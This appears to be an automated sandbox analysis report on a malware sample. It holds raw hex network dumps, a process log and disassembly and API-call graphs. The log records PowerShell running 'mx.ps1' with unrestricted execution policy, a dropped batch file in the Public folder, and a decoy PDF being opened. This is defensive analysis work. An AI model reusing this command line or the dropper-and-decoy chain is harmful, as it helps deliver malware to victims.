                                                      2023-06-01 10:14:27 UTC281INData Raw: f9 9c 33 61 b2 bd b6 aa 7c 46 6f 7a d7 82 95 5e 27 b3 f1 d6 4f 42 27 94 ca ae 4a a6 e4 9f 74 7e b7 47 91 c8 4c 12 d7 9e 7b 77 f0 8f 91 d0 9a dc 8e 61 c4 11 ef 9a 7c c5 58 cd d8 e4 2e 08 13 63 fe e7 ef 3e f1 82 c1 a6 74 b2 50 cf cf 97 df 97 2b de f6 13 ab 23 ec 92 19 c4 2a 82 c1 be 5a 29 fc 92 51 5e 28 fc 79 fb 44 83 b8 b8 35 fe d9 e7 f6 2d 1f 27 07 38 9b 00 dc c9 3a cb bd 64 e0 33 cc 28 18 0a db 00 1a 8d 91 32 a0 6f a3 7a 69 32 d4 f2 50 5d ce f6 17 a3 b3 b9 e9 39 3e 23 5a 3e a8 4b 9f 02 8f be b7 5f 59 4a 97 20 51 e3 94 49 99 b5 03 2d 18 45 ee 35 41 3d 45 0c 80 32 c4 51 0c 95 21 f5 61 e9 cd f2 11 7b 55 71 ed 0c 00 8d f6 2e a0 29 88 a5 e8 96 b1 17 25 a2 25 02 9a a9 75 ff 41 9a bb 5c 9b 5d 2a 5d a9 bd 7e 2f 26 fe c8 32 9d 3f 89 70 e6 5e f0 ec 9d e0 a9 44 10
                                                      Data Ascii: 3a|Foz^'OB'Jt~GL{wa|X.c>tP+#*Z)Q^(yD5-'8:d3(2ozi2P]9>#Z>K_YJ QI-E5A=E2Q!a{Uq.)%%uA\]*]~/&2?p^D
                                                      2023-06-01 10:14:27 UTC289INData Raw: f6 08 a7 ee 45 10 70 3b 2f cb 29 d6 9e a2 d6 32 65 70 38 88 e0 d5 55 85 37 a6 86 68 0f 40 40 16 49 af 87 41 c6 55 ae 68 b3 5c 0a 70 64 48 92 70 fe bc ae 05 b3 cd 13 48 ef 88 a8 44 97 65 61 7e 29 c6 6d b0 35 f2 b6 59 cf 0f ae 0e 80 d3 cf ef f5 ea 03 93 2a ba 5a 25 35 d7 08 65 9f aa d5 b9 60 da b3 2d 55 2d a8 ab 5b 33 cf 47 83 ca b2 b2 0d 01 d5 17 f3 f4 38 16 eb 93 88 5a a7 00 06 a6 47 55 65 b3 d3 a8 b5 7a a3 8b c2 00 98 12 ac f8 0b f5 ff b4 ce 27 71 c5 75 44 9f ed b5 62 34 58 00 3f da f5 d6 fc e3 75 42 38 ea 16 4a 9b 86 27 2b 09 ac d3 c1 8f 4e 33 fb e2 1c 1e 94 08 2f 87 0e a6 59 a6 e9 a2 5b 4b ec 70 4e 2a 14 04 c4 f3 dd 30 87 02 a0 19 76 43 1f f2 17 8d 7e d1 25 1c 0e 85 af 3f ab 85 e7 04 31 aa 10 a9 69 6e 74 7d 10 5d 84 b4 73 f9 6e c5 26 63 79 5a cb 86 b4
                                                      Data Ascii: Ep;/)2ep8U7h@@IAUh\pdHpHDea~)m5Y*Z%5e`-U-[3G8ZGUez'quDb4X?uB8J'+N3/Y[KpN*0vC~%?1int}]sn&cyZ
                                                      2023-06-01 10:14:27 UTC297INData Raw: 83 65 9f 0a db b0 af f7 4b 23 87 b6 34 88 f1 9f ca c8 c8 46 8e 09 e0 4b 47 06 68 98 a1 d4 ed 0d ed e0 45 66 ba 1c 3f 70 0f f6 8e a9 42 4a 02 35 2a bc ad 3e 4a 94 7f 35 ce 36 1a f6 2a ed af 21 06 8b 7a 96 b7 66 fe 3e 0d b9 94 15 8d f1 34 2b ea 9b 2c 5d de 9c 3c 9c 30 ed 28 3f 31 af 9c 11 62 a5 05 fc b0 06 f7 aa b0 5f c9 b9 30 88 be b4 9f 54 82 85 a6 a6 e7 e0 bf 3a 77 d0 38 f5 56 2a 09 fd a8 70 27 99 fe 6b ed 7d c6 ea 6a ca 78 57 92 89 c3 55 25 3e 96 b3 b5 08 55 17 fb 6f db 8a c8 d8 e2 3a f1 3d 98 9b 05 9b 10 18 34 31 8d 51 d8 86 3c 63 0e 67 f8 24 41 d1 0f b9 45 d1 56 03 66 a4 a1 13 fa 34 30 e0 c9 d7 65 2b 00 75 f4 c4 34 77 17 50 99 34 25 93 f3 7f 21 de 61 c2 4c 65 df 93 da 61 24 d1 9e 85 de ca b0 75 1d b6 fd d8 58 f1 1f 82 c5 db 90 02 d5 fe ea 32 4e c0 b3
                                                      Data Ascii: eK#4FKGhEf?pBJ5*>J56*!zf>4+,]<0(?1b_0T:w8V*p'k}jxWU%>Uo:=41Q<cg$AEVf40e+u4wP4%!aLea$uX2N
                                                      2023-06-01 10:14:27 UTC304INData Raw: c5 bd 5d ea 80 6b d7 1b 4c 6a c4 95 03 ec ed ee 50 8a 01 89 94 1c d8 b9 26 0a ce de bc 07 ff 21 37 0d 5f c0 7b 5e 01 f9 6f 2e 21 a3 c5 ce 56 76 85 ab 0f 88 2d 86 f3 af cd e3 5a 85 e2 22 2a 8d b3 5b 9d 0d 17 50 6a ef a8 f4 2d e6 d8 f9 53 e8 e3 ea 68 19 fb a6 28 d1 99 3b 33 59 2c 47 1a c2 72 f7 41 de 8a 2c 37 18 44 c2 bb 48 bb ed cb 84 75 e5 34 68 be c3 a4 04 18 25 77 f6 dd 61 1d 49 68 ff 5e 5e 2d 4e 93 32 92 8e ec 8b 06 96 a8 1e 28 eb 74 c7 ab 91 c0 98 e1 2d a8 a4 5c d3 68 0c 0e b7 c0 24 63 99 ee ac 86 a1 01 fa ff 2b a0 9f d0 b4 7b 63 b6 31 1f da 4b df 72 30 99 28 ec 40 cd 06 2e 06 a7 e8 e1 72 98 be ae 4a 7a 01 3b 61 89 ae 5b 2b c2 48 ce 65 fa d4 75 cf 06 c3 a0 8f e3 c7 8a 53 cc 83 98 c2 e1 c9 f5 63 d5 ee cd 43 4e 2e a4 de 0a 04 4c f6 a2 8a f6 5c 1e 4c a8
                                                      Data Ascii: ]kLjP&!7_{^o.!Vv-Z"*[Pj-Sh(;3Y,GrA,7DHu4h%waIh^^-N2(t-\h$c+{c1Kr0(@.rJz;a[+HeuScCN.L\L
                                                      2023-06-01 10:14:27 UTC312INData Raw: 83 f4 7b ba 44 80 61 bf 29 0b 6e 96 8b f5 23 6d 98 58 cc dd 61 9c df b1 d9 a0 7c 0f 39 6f 01 82 10 09 bd a4 f9 ec 9d 26 fc f5 07 1e 2e eb c4 d2 83 0c 89 8f 7d e8 f0 41 ef 60 ef d8 9f 9d 75 a4 37 04 44 dd 08 ee 8c 5e ed 3a 7f 72 13 aa 2f 2a b2 5c f3 d8 f1 26 69 11 72 d3 d6 db 28 56 f4 b3 2f cb 25 83 90 dc ae 45 6e 1f 6d 10 b3 ae 70 2b e0 7c 8d 99 f0 db 2f ae 2a 78 20 e8 ae 98 2c b7 14 26 a6 64 97 fd 6b 4c fd 33 d6 83 42 62 45 5b 7c 08 a6 1c 66 a3 d3 4a 79 d3 a6 08 57 32 63 08 c9 10 7f 1f a1 e7 3a e5 a2 16 8f 64 34 be cd 1a 13 e0 e6 69 4d ca 48 cd ed 3f 17 00 e3 77 70 00 e3 08 c1 c5 ad 0f fb a1 82 fa d8 7d 24 36 4c 53 42 e5 22 28 0a b1 66 a6 d6 13 3f 5f 07 d5 18 74 b3 90 69 c9 f5 bb 53 8f d8 fe c9 54 56 ff a4 5f e6 93 e7 99 07 f6 5f 5b 7f 31 47 1c ac 93 7c
                                                      Data Ascii: {Da)n#mXa|9o&.}A`u7D^:r/*\&ir(V/%Enmp+|/*x ,&dkL3BbE[|fJyW2c:d4iMH?wp}$6LSB"(f?_tiSTV__[1G|
                                                      2023-06-01 10:14:27 UTC320INData Raw: 9d a2 e0 69 93 0f 84 c4 d3 8a 0a 05 0a bc dd 19 12 17 90 36 9d 3d dd 1d ad 0a 66 0c 8e db 7c fc 08 17 85 2a c5 ec ea 7e 28 e2 e5 dd 88 8d 80 77 77 42 94 d8 85 cb 1a a7 21 65 73 51 cf 76 d9 58 6f ef 21 93 58 82 d5 87 6c a7 38 db b1 c2 20 80 a5 5a e6 a8 9b 31 e8 bf ea ae 77 c3 69 07 d0 dd bc 2c 6e 19 1d 1a 6f d3 f6 e9 a2 99 89 8d e3 dc a6 2d 7c d5 b3 69 3b 08 95 ba 16 7e de ce 93 76 1e 05 76 3e ec cf fc 60 1f 06 1b d7 5b 18 4a 67 31 ec f0 d5 b6 a1 00 d0 14 6a 3d 56 dc c8 1c 0c 45 dd ae 32 71 42 a5 c7 30 2b c3 8f e1 86 90 42 fa 63 03 a9 9b 34 f7 52 90 eb f0 05 8a 41 67 10 83 8e 07 3e 58 76 5c 3f 6f b1 a2 53 f8 b9 e9 81 97 80 f7 3e ab e9 8c 1a 02 ce e8 f1 2f 10 f5 ac 67 05 59 95 46 57 af 86 83 11 e4 f9 a4 37 b4 1b f9 b0 eb 9a 06 c7 af d4 34 f0 ae a3 84 b9 e7
                                                      Data Ascii: i6=f|*~(wwB!esQvXo!Xl8 Z1wi,no-|i;~vv>`[Jg1j=VE2qB0+Bc4RAg>Xv\?oS>/gYFW74
                                                      2023-06-01 10:14:27 UTC328INData Raw: 93 cb 1d f6 87 3b 47 9a b6 de 49 bc 4f 9e e0 31 f2 b6 40 cd 7c 13 5c 69 dc 21 3d d2 1a 81 8f db 8d 57 89 b9 89 3e db 1f 9b f4 7a 19 93 de b0 03 bd e3 ee 03 09 86 87 d2 25 8d 90 51 0e 47 b3 a1 55 1c e7 d9 be a1 12 5f 99 91 d7 0f 43 95 96 33 a0 4d c9 9d f9 98 db 9d 7c cd 3b 80 b6 50 87 e2 27 59 cf ac dc c4 80 bb 95 c5 e3 b2 d1 2b 2c b1 e0 be 38 02 bc 7c 07 1d 8f 04 af d8 6f fa 7b 42 bb f8 9b 73 5e d8 44 a8 21 57 5a 7d 5c d1 3c 35 4a a4 f9 19 bd 2b ef af 3c d8 58 3e b7 16 ad 9b 41 3b 2f 80 19 81 bd 76 b9 14 87 c3 95 37 b2 6d cd c4 25 ba 56 0e df 58 78 26 96 6c 52 bd bd 2b 98 d3 7b 51 96 0c 2d 5e 86 b3 5b f0 ef c8 42 25 6b 91 53 de 9a f3 67 17 bb 7f 64 ec e4 16 c6 38 83 69 df 81 2a 59 15 28 58 c2 13 da 87 77 be 41 4f f4 f2 1c fb bb 1b c2 37 24 f6 89 ed 65 d5
                                                      Data Ascii: ;GIO1@|\i!=W>z%QGU_C3M|;P'Y+,8|o{Bs^D!WZ}\<5J+<X>A;/v7m%VXx&lR+{Q-^[B%kSgd8i*Y(XwAO7$e
                                                      2023-06-01 10:14:27 UTC336INData Raw: ad e7 00 41 12 bd 7c 50 6d 6b 1e 11 31 27 9e 3c 43 2b 1f 77 2a 0d 67 fb cc 09 f7 57 34 1c 4d 75 8b d4 36 52 0d 1e e3 99 cf 29 22 71 bb e2 56 ff e8 7c 16 b6 5c 01 00 80 5d 00 00 80 00 00 1e 0f cb 87 11 d8 ce 66 91 0f 83 1e ca fd 7b 33 d4 7f e9 b7 da 28 31 76 25 66 20 4d 2a 09 6d 6a f7 29 70 38 30 e7 cc 1d 56 17 b0 33 ba 47 46 e1 ec 9d a0 05 65 42 a2 ab b4 e0 13 ea 1b b9 7e c0 33 7e 58 39 6c 7e 61 d3 13 6d 5b 6f a8 d9 37 fd d3 6c c9 23 ba 79 3a 29 2e da 5c 1b 28 3b c5 84 24 cc 97 01 21 da c9 ff 31 41 87 2a e3 b9 92 5b 94 c7 21 85 38 7d f2 f2 e9 b5 52 97 ba 2a 10 a5 f0 45 63 ac 61 92 7f 8d db be 69 26 dc 22 03 c6 76 60 04 8f 8b f7 52 4e ce 96 33 9f a4 55 9b 34 49 5c d0 20 72 4d b7 1e e6 22 1c e5 b1 ae 97 fe 5c 80 89 07 b9 2d 80 c1 45 e6 d1 75 63 4c 68 f8 96
                                                      Data Ascii: A|Pmk1'<C+w*gW4Mu6R)"qV|\]f{3(1v%f M*mj)p80V3GFeB~3~X9l~am[o7l#y:).\(;$!1A*[!8}R*Ecai&"v`RN3U4I\ rM"\-EucLh


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:12:14:21
                                                      Start date:01/06/2023
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mx.ps1
                                                      Imagebase:0x7ff745ad0000
                                                      File size:447488 bytes
                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Target ID:1
                                                      Start time:12:14:21
                                                      Start date:01/06/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c72c0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:2
                                                      Start time:12:14:27
                                                      Start date:01/06/2023
                                                      Path:C:\Users\Public\u5p3.bat
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\u5p3.bat"
                                                      Imagebase:0x400000
                                                      File size:344681 bytes
                                                      MD5 hash:9DCA43CB15D97693D2DE73683804C5C7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 3%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:3
                                                      Start time:12:14:31
                                                      Start date:01/06/2023
                                                      Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
                                                      Imagebase:0x9f0000
                                                      File size:2571312 bytes
                                                      MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:4
                                                      Start time:12:14:37
                                                      Start date:01/06/2023
                                                      Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                      Imagebase:0x3f0000
                                                      File size:9475120 bytes
                                                      MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FF81504126D Relevance: 5.4, Strings: 4, Instructions: 387COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.679679899.00007FF815040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff815040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: g^s$g^s$g^s$g^s
                                                        • API String ID: 0-588792220
                                                        • Opcode ID: 3b30bd7dca9ed3b20334e3d839252777c4851fe32aa3876333d0036bad2032fa
                                                        • Instruction ID: 94a027e2718b952ffccf5ee58c95e0c8c6871d1f47c2c1252f66ad610a15707e
                                                        • Opcode Fuzzy Hash: 3b30bd7dca9ed3b20334e3d839252777c4851fe32aa3876333d0036bad2032fa
                                                        • Instruction Fuzzy Hash: DEB12C32F1DE864FEBA9966C98552B577D1EF85A70B0802BED44DCB1E3EE18AC064341
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF8150420B9 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.679679899.00007FF815040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff815040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @("q$g^s
                                                        • API String ID: 0-746315951
                                                        • Opcode ID: 4a3ae9fd316fef8f8d232cae2a5f0166583db2fb059ae7d0b001a02d14652b53
                                                        • Instruction ID: ae63fe4aac254cf7c7fab5c85f24a320d37cba7509c1eb923c29cdd2e6db02c9
                                                        • Opcode Fuzzy Hash: 4a3ae9fd316fef8f8d232cae2a5f0166583db2fb059ae7d0b001a02d14652b53
                                                        • Instruction Fuzzy Hash: 5241F712E0EBC64FE75697686C641B87BE1EF666A0B0901FBC048CB1B3DE099C498351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF815042147 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.679679899.00007FF815040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff815040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @("q$g^s
                                                        • API String ID: 0-746315951
                                                        • Opcode ID: 201d3637da64f84d8440b07b0b2d91617ff8c9c69c147ad490689cc4f9134a13
                                                        • Instruction ID: 5873e8d2de5ffdeaf69c3f7576213b4d664804e2140f5f00f5fdf256e9177127
                                                        • Opcode Fuzzy Hash: 201d3637da64f84d8440b07b0b2d91617ff8c9c69c147ad490689cc4f9134a13
                                                        • Instruction Fuzzy Hash: 1C31F813F0DECB4FF7A5A6B868552B866D0EF65AE0F1806BAC449CB1E3EF095C484211
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF8150413F4 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.679679899.00007FF815040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff815040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: g^s$g^s
                                                        • API String ID: 0-3192896210
                                                        • Opcode ID: 27df81c1134669a07034951787520659d97178439ef345ac47fcef95641950d3
                                                        • Instruction ID: 303e343eb1d61e33e784ab6f078ea3216fb15650fc26bacaf4a99f0a9518d744
                                                        • Opcode Fuzzy Hash: 27df81c1134669a07034951787520659d97178439ef345ac47fcef95641950d3
                                                        • Instruction Fuzzy Hash: 07213A32F1DE464BEBA5D6AC9851274B6D3EF84BA0B5802BAC80DCB1E3DE19EC454301
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF814F735FA Relevance: .6, Instructions: 585COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.678953176.00007FF814F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff814f70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9b3065208a8b28db99e6a8774b2be0e2fd67b943887adcecfb015cc443000ad5
                                                        • Instruction ID: 566d390413bb6f289a208a1cd688386f9ac5abf44441785bb5f57963917c72d9
                                                        • Opcode Fuzzy Hash: 9b3065208a8b28db99e6a8774b2be0e2fd67b943887adcecfb015cc443000ad5
                                                        • Instruction Fuzzy Hash: E0F11923A1DA559FD705F62CF8965F97B90DF433B1B1401BBD088CB1A3DA19A88AC391
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF814F75839 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.678953176.00007FF814F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff814f70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed8bd9d886beb1da801dc3f238c49f0d646c5b09b4e9d46848a9eddc1470a09a
                                                        • Instruction ID: 097bec2bfa905f825e9ca7b670bbcc700b9a74e0cfbe9ee1bb95ed59ef7b4013
                                                        • Opcode Fuzzy Hash: ed8bd9d886beb1da801dc3f238c49f0d646c5b09b4e9d46848a9eddc1470a09a
                                                        • Instruction Fuzzy Hash: E0210331A18D598FDF98EB58C485EADB7A1EF69750F640169D00DD7286CA28EC82CBC0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF814F72140 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.678953176.00007FF814F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff814f70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c02c21fe2ad46bdf17a003712516e060bd01a96e9ef684b7f545d045b96e78ec
                                                        • Instruction ID: b716d3f49506cd909c9c86b0248621fa5d05ba541b2b469bf2363b7cbfb6e72e
                                                        • Opcode Fuzzy Hash: c02c21fe2ad46bdf17a003712516e060bd01a96e9ef684b7f545d045b96e78ec
                                                        • Instruction Fuzzy Hash: 9C21513150CB484FC705EB14D8519AABBE2FFD5350F04066EE48AD3395DE68EA49C782
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF814F71B75 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.678953176.00007FF814F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff814f70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa24d169894c9bccf47dbde038d63f19e62b71b74d3f3b4af4ba2d6cd03bcfd9
                                                        • Instruction ID: 4f47b2da61e32882a2b0759a2003ba2387c2357c6b94c2bdccf0749ca52873ed
                                                        • Opcode Fuzzy Hash: aa24d169894c9bccf47dbde038d63f19e62b71b74d3f3b4af4ba2d6cd03bcfd9
                                                        • Instruction Fuzzy Hash: 1C01677111CB0C8FD744EF0CE491AA6B7E0FB95364F10056EE58AC3651DA36E891CB46
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF814F75578 Relevance: .0, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.678953176.00007FF814F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff814f70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3984819df29a25c6d82832b83c87842917acefa9a70addd3a0e971a136cd1da7
                                                        • Instruction ID: 80ec9b2b2af17f19ad50a1b81988da43bc666ff969afeb8d26dcd6de330a2d57
                                                        • Opcode Fuzzy Hash: 3984819df29a25c6d82832b83c87842917acefa9a70addd3a0e971a136cd1da7
                                                        • Instruction Fuzzy Hash: 18F0C03276CA444F975C9A0CF8939B573D1E789225B50016EE48EC3696E916B8428685
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF8150446B0 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.679679899.00007FF815040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff815040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 459508136d691b98c337d0bc1c7319d45436dbe0016465872cf6eb674a5c00c3
                                                        • Instruction ID: 57ffd7a72098a0b40a0713d331fab38cfb7be726ef19fffd92a37da8596bf61b
                                                        • Opcode Fuzzy Hash: 459508136d691b98c337d0bc1c7319d45436dbe0016465872cf6eb674a5c00c3
                                                        • Instruction Fuzzy Hash: 3BF0E533E0C94D8FEB49E7ACA445BE8BBB1EB59390F14007EC00CC7152C929A4858751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:20.8%
                                                        Dynamic/Decrypted Code Coverage:13%
                                                        Signature Coverage:19.7%
                                                        Total number of Nodes:1568
                                                        Total number of Limit Nodes:42
                                                        execution_graph 5155 10001000 5158 1000101b 5155->5158 5165 10001516 5158->5165 5160 10001020 5161 10001024 5160->5161 5162 10001027 GlobalAlloc 5160->5162 5163 1000153d 3 API calls 5161->5163 5162->5161 5164 10001019 5163->5164 5167 1000151c 5165->5167 5166 10001522 5166->5160 5167->5166 5168 1000152e GlobalFree 5167->5168 5168->5160 4179 401941 4180 401943 4179->4180 4181 402c37 17 API calls 4180->4181 4182 401948 4181->4182 4185 40595a 4182->4185 4224 405c25 4185->4224 4188 405982 DeleteFileW 4190 401951 4188->4190 4189 405999 4191 405ab9 4189->4191 4238 40624c lstrcpynW 4189->4238 4191->4190 4256 40658f FindFirstFileW 4191->4256 4193 4059bf 4194 4059d2 4193->4194 4195 4059c5 lstrcatW 4193->4195 4239 405b69 lstrlenW 4194->4239 4196 4059d8 4195->4196 4199 4059e8 lstrcatW 4196->4199 4201 4059f3 lstrlenW FindFirstFileW 4196->4201 4199->4201 4201->4191 4204 405a15 4201->4204 4202 405ae2 4259 405b1d lstrlenW CharPrevW 4202->4259 4206 405a9c FindNextFileW 4204->4206 4219 405a5d 4204->4219 4243 40624c lstrcpynW 4204->4243 4206->4204 4210 405ab2 FindClose 4206->4210 4207 405912 5 API calls 4209 405af4 4207->4209 4211 405af8 4209->4211 4212 405b0e 4209->4212 4210->4191 4211->4190 4216 4052b0 24 API calls 4211->4216 4214 4052b0 24 API calls 4212->4214 4214->4190 4215 40595a 60 API calls 4215->4219 4217 405b05 4216->4217 4218 406012 36 API calls 4217->4218 4221 405b0c 4218->4221 4219->4206 4219->4215 4220 4052b0 24 API calls 4219->4220 4222 4052b0 24 API calls 4219->4222 4244 405912 4219->4244 4252 406012 MoveFileExW 4219->4252 4220->4206 4221->4190 4222->4219 4262 40624c lstrcpynW 4224->4262 4226 405c36 4263 405bc8 CharNextW CharNextW 4226->4263 4229 40597a 4229->4188 4229->4189 4230 4064e0 5 API calls 4236 405c4c 4230->4236 4231 405c7d lstrlenW 4232 405c88 4231->4232 4231->4236 4233 405b1d 3 API calls 4232->4233 4235 405c8d GetFileAttributesW 4233->4235 4234 40658f 2 API calls 4234->4236 4235->4229 4236->4229 4236->4231 4236->4234 4237 405b69 2 API calls 4236->4237 4237->4231 4238->4193 4240 405b77 4239->4240 4241 405b89 4240->4241 4242 405b7d CharPrevW 4240->4242 4241->4196 4242->4240 4242->4241 4243->4204 4269 405d19 GetFileAttributesW 4244->4269 4247 40593f 4247->4219 4248 405935 DeleteFileW 4250 40593b 4248->4250 4249 40592d RemoveDirectoryW 4249->4250 4250->4247 4251 40594b SetFileAttributesW 4250->4251 4251->4247 4253 406026 4252->4253 4255 406033 4252->4255 4272 405e98 4253->4272 4255->4219 4257 405ade 4256->4257 4258 4065a5 FindClose 4256->4258 4257->4190 4257->4202 4258->4257 4260 405ae8 4259->4260 4261 405b39 lstrcatW 4259->4261 4260->4207 4261->4260 4262->4226 4264 405be5 4263->4264 4265 405bf7 4263->4265 4264->4265 4266 405bf2 CharNextW 4264->4266 4267 405b4a CharNextW 4265->4267 4268 405c1b 4265->4268 4266->4268 4267->4265 4268->4229 4268->4230 4270 40591e 4269->4270 4271 405d2b SetFileAttributesW 4269->4271 4270->4247 4270->4248 4270->4249 4271->4270 4273 405ec8 4272->4273 4274 405eee GetShortPathNameW 4272->4274 4299 405d3e GetFileAttributesW CreateFileW 4273->4299 4276 405f03 4274->4276 4277 40600d 4274->4277 4276->4277 4279 405f0b wsprintfA 4276->4279 4277->4255 4278 405ed2 CloseHandle GetShortPathNameW 4278->4277 4281 405ee6 4278->4281 4280 40626e 17 API calls 4279->4280 4282 405f33 4280->4282 4281->4274 4281->4277 4300 405d3e GetFileAttributesW CreateFileW 4282->4300 4284 405f40 4284->4277 4285 405f4f GetFileSize GlobalAlloc 4284->4285 4286 405f71 4285->4286 4287 406006 CloseHandle 4285->4287 4301 405dc1 ReadFile 4286->4301 4287->4277 4292 405f90 lstrcpyA 4295 405fb2 4292->4295 4293 405fa4 4294 405ca3 4 API calls 4293->4294 4294->4295 4296 405fe9 SetFilePointer 4295->4296 